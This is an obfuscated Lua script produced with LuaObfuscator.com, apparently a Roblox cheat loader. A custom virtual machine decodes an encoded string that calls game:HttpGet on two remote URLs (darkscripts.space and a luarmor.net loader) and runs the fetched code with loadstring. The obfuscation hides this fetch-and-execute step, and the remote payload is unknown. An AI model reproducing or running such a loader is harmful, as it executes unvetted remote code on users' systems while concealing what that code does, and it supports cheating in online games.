--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v90=v5(v82,v19);v19=nil;return v90;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-(620 -(555 + (941 -(282 + 595)))))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(367 + (1838 -(1523 + 114))))) ;end end else local v85=927 -(214 + 713) ;local v86;while true do if (v85==(0 + 0)) then v86=2^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and 1) or 0 ;end end end end local function v21() local v34=0;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=(5534 -4263) -(226 + 1044) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v37 * (57 + 199)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;return (v41 * (31011612 -14234396)) + (v40 * (120312 -54776)) + (v39 * (606 -((267 -(67 + 113)) + 263))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,2 -1 ,15 + 5 ) * ((7 -5)^(984 -(802 + 150)))) + v42 ;local v46=v20(v43,56 -35 ,55 -24 );local v47=((v20(v43,(92 -68) + 8 )==(998 -(915 + 82))) and  -(2 -1)) or (1 + 0) ;if (v46==((442 -(416 + 26)) -0)) then if (v45==(1187 -(1069 + 118))) then return v47 * ((0 -0) -0) ;else v46=(1 + 0) -0 ;v44=0;end elseif (v46==((629 -273) + 1691)) then return ((v45==0) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -(368 + 423)) ) * (v44 + (v45/((6 -4)^(70 -(10 + 8))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(438 -(145 + 293))) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v65=431 -(44 + 386) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 1695 -(1229 + 466) ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 0;end)();while true do if (v67==(1666 -(970 + 695))) then if (v51~=0) then else v52=(function() return function(v100,v101,v102) local v103=(function() return 578 -(386 + 192) ;end)();while true do if (v103==(1206 -(696 + 510))) then local v131=(function() return 0 -0 ;end)();while true do if (v131~=(0 -0)) then else v100[v101-#"!" ]=(function() return v102();end)();return v100,v101,v102;end end end end end;end)();v53=(function() return {};end)();v54=(function() return {};end)();v55=(function() return {};end)();v51=(function() return 1263 -(1091 + 171) ;end)();end break;end if (v67==(0 + 0)) then if ((3 -2)~=v51) then else local v95=(function() return 1824 -(1195 + 629) ;end)();while true do if (v95~=(0 -0)) then else v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v95=(function() return 375 -(123 + 251) ;end)();end if (v95==2) then v51=(function() return 2;end)();break;end if (v95~=1) then else v58=(function() return {};end)();for v108= #"[",v57 do local v109=(function() return 0;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (1==v109) then v112=(function() return nil;end)();while true do if (v110==(780 -(162 + 618))) then local v167=(function() return 0 -0 ;end)();while true do if (v167~=(698 -(208 + 490))) then else v111=(function() return v21();end)();v112=(function() return nil;end)();v167=(function() return 1 + 0 ;end)();end if (v167==1) then v110=(function() return 1;end)();break;end end end if ((1 + 0)~=v110) then else if (v111== #",") then v112=(function() return v21()~=(0 -0) ;end)();elseif (v111==2) then v112=(function() return v24();end)();elseif (v111~= #"gha") then else v112=(function() return v25();end)();end v58[v108]=(function() return v112;end)();break;end end break;end if (v109==0) then local v155=(function() return 836 -(660 + 176) ;end)();while true do if (1==v155) then v109=(function() return 1;end)();break;end if (v155==(0 + 0)) then v110=(function() return 1636 -(1373 + 263) ;end)();v111=(function() return nil;end)();v155=(function() return 1;end)();end end end end end v95=(function() return 1002 -(451 + 549) ;end)();end end end if (v51~=2) then else v56[ #"gha"]=(function() return v21();end)();for v97= #" ",v23() do local v98=(function() return v21();end)();if (v20(v98, #"!", #"!")==(0 + 0)) then local v104=(function() return 0 -0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104~=(1 + 0)) then else local v135=(function() return 0;end)();while true do if ((202 -(14 + 188))~=v135) then else v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(0 + 0)) then local v172=(function() return 0 + 0 ;end)();local v173=(function() return;end)();while true do if (v172==(0 + 0)) then v173=(function() return 0 -0 ;end)();while true do if (v173==(1581 -(1535 + 46))) then v107[ #"19("]=(function() return v22();end)();v107[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v105== #",") then v107[ #"91("]=(function() return v23();end)();elseif (v105==(2 + 0)) then v107[ #"xnx"]=(function() return v23() -((1 + 1)^(25 -9)) ;end)();elseif (v105== #"asd") then local v178=(function() return 0 -0 ;end)();local v179=(function() return;end)();while true do if (v178~=(0 + 0)) then else v179=(function() return 0 -0 ;end)();while true do if (v179==0) then v107[ #"-19"]=(function() return v23() -((1469 -(899 + 568))^(11 + 5)) ;end)();v107[ #"0836"]=(function() return v22();end)();break;end end break;end end end v135=(function() return 1;end)();end if (v135==(397 -(115 + 281))) then v104=(function() return 2;end)();break;end end end if (v104==(0 -0)) then local v136=(function() return 0 -0 ;end)();local v137=(function() return;end)();while true do if (v136~=(0 + 0)) then else v137=(function() return 0;end)();while true do if (v137==(2 -1)) then v104=(function() return 1;end)();break;end if (v137==(0 -0)) then v105=(function() return v20(v98,869 -(550 + 317) , #"xnx");end)();v106=(function() return v20(v98, #"http",8 -2 );end)();v137=(function() return 1;end)();end end break;end end end if ((2 -0)~=v104) then else if (v20(v106, #"\\", #"~")== #"{") then v107[5 -3 ]=(function() return v58[v107[5 -3 ]];end)();end if (v20(v106,2,287 -(134 + 151) )== #"~") then v107[ #"xxx"]=(function() return v58[v107[ #"-19"]];end)();end v104=(function() return 1027 -(706 + 318) ;end)();end if (v104==(1254 -(721 + 530))) then if (v20(v106, #"91(", #"gha")~= #"[") then else v107[ #"asd1"]=(function() return v58[v107[ #"?id="]];end)();end v53[v97]=(function() return v107;end)();break;end end end end for v99= #"|",v23() do v54,v99,v28=(function() return v52(v54,v99,v28);end)();end return v56;end v67=(function() return 1272 -(945 + 326) ;end)();end end end end local function v29(v59,v60,v61) local v62=v59[2 -1 ];local v63=v59[2 + (0 -0) ];local v64=v59[703 -(271 + 429) ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -(1 + 0) ;local v77={};local v78={};for v87=1500 -(1408 + 92) ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + (1087 -(461 + 625)) ];else v78[v87]=v75[v87 + (1289 -(993 + 295)) ];end end local v79=(v76-v70) + 1 + 0 + 0 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1172 -(418 + 753) ];if (v81<=(4 + 5)) then if (v81<=(2 + 2)) then if (v81<=(1 + 0)) then if ((518<902) and (v81==(0 + 0))) then v78[v80[(2 -1) + (2 -1) ]]();else v78[v80[1 + 1 ]]=v80[532 -(406 + 123) ];end elseif (v81<=(1771 -(1749 + 20))) then v72=v80[3];elseif ((2994>858) and (v81>(1 + 2))) then v72=v80[1325 -(1249 + (163 -90)) ];else v78[v80[1 + 1 ]]=v80[1148 -(466 + 198 + 481) ];end elseif (v81<=((67 -53) -(761 -(239 + 514)))) then if (v81==(14 -9)) then if ((v78[v80[(669 + 1233) -((1435 -(797 + 532)) + 1794) ]]==v80[2 + 2 ]) or (3755<=915)) then v72=v72 + 1 + 0 + 0 ;else v72=v80[8 -5 ];end else do return;end end elseif (v81<=(18 -11)) then local v116=v80[116 -(4 + 110) ];v78[v116]=v78[v116](v13(v78,v116 + (585 -(57 + 527)) ,v73));elseif (v81==(1435 -(41 + 1386))) then local v143=103 -(17 + 86) ;local v144;local v145;local v146;local v147;while true do if (v143==(2 + 0)) then for v169=v144,v73 do v147=v147 + ((1 + 0) -0) ;v78[v169]=v145[v147];end break;end if ((3946>3743) and (v143==0)) then v144=v80[5 -(6 -3) ];v145,v146=v71(v78[v144](v13(v78,v144 + 1 ,v80[169 -(122 + 44) ])));v143=1;end if (((1 -0)==v143) or (1335>=3306)) then v73=(v146 + v144) -1 ;v147=1202 -(373 + 829) ;v143=6 -(735 -(476 + 255)) ;end end else v78[v80[2 + 0 ]]();end elseif (v81<=(3 + 11)) then if ((4844>2253) and (v81<=11)) then if (v81==(20 -10)) then v78[v80[(1197 -(369 + 761)) -(30 + 35) ]]=v61[v80[3 + 0 ]];else v78[v80[1259 -(1043 + 214) ]]=v80[3]~=(0 -0) ;end elseif (v81<=12) then local v121=v80[1214 -(323 + 889) ];v78[v121]=v78[v121](v13(v78,v121 + (2 -1) ,v73));elseif ((452==452) and (v81==(593 -(361 + 219)))) then do return;end elseif (v78[v80[322 -(53 + 267) ]]==v80[1 + 3 ]) then v72=v72 + 1 ;else v72=v80[416 -(15 + 398) ];end elseif (v81<=16) then if ((v81>(997 -(18 + 964))) or (4557<2087)) then local v123=0 -0 ;local v124;local v125;while true do if (v123==(1 + 0 + 0)) then v78[v124 + 1 + 0 ]=v125;v78[v124]=v125[v80[854 -((36 -16) + 830) ]];break;end if ((0 + 0)==v123) then v124=v80[128 -(116 + 10) ];v125=v78[v80[5 -2 ]];v123=1 + 0 ;end end else v78[v80[(978 -(64 + 174)) -(542 + 196) ]]=v80[6 -(1 + 2) ]~=(0 + 0) ;end elseif (v81<=(9 + 8)) then local v127=v80[1 + 1 ];local v128,v129=v71(v78[v127](v13(v78,v127 + 1 ,v80[7 -4 ])));v73=(v129 + v127) -(2 -1) ;local v130=1551 -(1126 + 425) ;for v132=v127,v73 do v130=v130 + (406 -(118 + 287)) ;v78[v132]=v128[v130];end elseif (v81>18) then local v148=v80[7 -5 ];local v149=v78[v80[1124 -(118 + 1003) ]];v78[v148 + ((2 -0) -1) ]=v149;v78[v148]=v149[v80[381 -(142 + 235) ]];else v78[v80[9 -7 ]]=v61[v80[1 + 2 ]];end v72=v72 + (978 -(553 + 424)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035D3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F38646133313830382D386439352D343832342D626136612D3462386232633962383364365F39332Q3633303134393735383231343239362E6C7561034D3Q00682Q7470733A2Q2F6170692E6C7561726D6F722E6E65742F66696C65732F76332F6C6F61646572732F33623231363963663533626336313034646162653865313935363265352Q63322E6C756100153Q0012013Q00013Q0026053Q000100010001002Q043Q0001000100120A000100023Q00120A000200033Q002010000200020004001201000400054Q000F000500014Q0011000200054Q000C00013Q00022Q000900010001000100120A000100023Q00120A000200033Q002010000200020004001201000400064Q0011000200044Q000C00013Q00022Q0009000100010001002Q043Q00140001002Q043Q000100012Q00063Q00017Q00",v9(),...);
